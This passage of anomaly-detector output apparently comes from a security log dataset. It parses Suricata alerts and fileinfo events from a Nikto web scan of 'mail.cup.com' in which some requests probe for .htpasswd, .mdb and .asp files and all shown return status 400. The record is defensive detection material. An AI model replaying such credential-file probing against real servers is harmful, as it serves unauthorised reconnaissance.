"/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46908, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2147479336955668,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2147479336955668, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80", "/parser/model/time": 1583349514.310209, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46910, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.310454, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":281440600897230,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46910, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":281440600897230,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 281440600897230, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46912 -> 192.168.10.154:80", "/parser/model/time": 1583349514.31217, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46912, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46912 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.312371, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46912, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1737271305486500, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80", "/parser/model/time": 1583349514.314733, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46914, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htpasswd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.31494, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":220086993078258,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 